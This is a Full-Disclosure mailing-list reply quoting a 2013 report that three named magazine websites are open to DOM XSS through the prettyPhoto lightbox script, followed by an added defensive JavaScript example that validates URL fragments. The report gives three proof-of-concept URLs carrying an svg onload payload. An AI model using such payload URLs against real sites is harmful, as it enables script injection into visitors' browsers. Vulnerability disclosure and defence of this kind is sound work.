Message-Id: <20130929142741.8ED37C04A7@smtp.hushmail.com>
Date: Sun, 29 Sep 2013 08:27:41 -0600
From: silence_is_best@...hmail.com
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Pentest Mag, Data Recovery Magazine,
	and Software Developer's Journal Vulnerable to DOM XSS

LoL...$180 a year...sham.

On 09/29/2013 at 8:13 AM, "Jay Turla" wrote:

I have been annoyed
lately by the staff of Pentest Magazine because of their spam
promotions and "Would you write for us" inquiries despite saying no to
their proposals. I don't like to write for them because they don't
offer their services for free (also, they sell their magazines to other
people yet they don't pay their writers - no just compensation). So
here is my full disclosure of Pentest Magazine, Data Recovery
Magazine, and Software Developer's Journal, which are all from the same
company or somehow related. The official websites of the magazines
mentioned are all vulnerable to DOM XSS because of the prettyPhoto js.

PoC:
http://datarecoverymag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
http://pentestmag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
http://sdjournal.org/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/

Attached are my screenshots.
P.S. No harm was done!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
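
Added example, not part of either message above and not the plugin's own code: one way a page that opens a lightbox from location.hash can reject fragments like the ones in the PoC URLs, by matching the decoded fragment against a strict pattern and picking the link by attribute comparison instead of building a selector or HTML string from it. The fragment shape, the function names and the sample links are assumptions made for illustration.

```javascript
// Assumed deep-link shape (illustrative, not taken from the plugin source):
//   #!prettyPhoto[<gallery>]/<index>/   or   #!prettyPhoto/<index>/
const DEEPLINK = /^#!prettyPhoto(?:\[([A-Za-z0-9_-]{1,32})\])?\/(\d{1,4})\/$/;

// Decode the fragment once, then accept it only if the whole string matches
// the allowlist pattern. Anything else (markup, quotes, extra path segments,
// broken percent-encoding) yields null and the page opens nothing.
function parseDeepLink(hash) {
  let decoded;
  try {
    decoded = decodeURIComponent(hash);
  } catch (e) {
    return null; // malformed percent-encoding
  }
  const m = DEEPLINK.exec(decoded);
  if (!m) return null;
  return { gallery: m[1] || null, index: Number(m[2]) };
}

// Select the target by comparing attribute values. The fragment never
// reaches a selector string, innerHTML, or an HTML-parsing jQuery call.
// In a browser, `links` would be Array.from(document.querySelectorAll('a[rel]')).
function findLink(links, target) {
  if (!target) return null;
  const rel = target.gallery ? `prettyPhoto[${target.gallery}]` : 'prettyPhoto';
  const matches = links.filter((a) => a.rel === rel);
  return matches[target.index] || null;
}

// Constructed sample data standing in for anchors on a page.
const SAMPLE_LINKS = [
  { rel: 'prettyPhoto[gallery1]', href: 'a.jpg' },
  { rel: 'prettyPhoto[gallery1]', href: 'b.jpg' },
  { rel: 'nofollow', href: 'c.html' },
];

// Fragment copied from the PoC URLs in the quoted message.
const POC_FRAGMENT =
  '#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/';

function demo() {
  return {
    poc: findLink(SAMPLE_LINKS, parseDeepLink(POC_FRAGMENT)),
    ok: findLink(SAMPLE_LINKS, parseDeepLink('#!prettyPhoto[gallery1]/1/')),
  };
}
```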
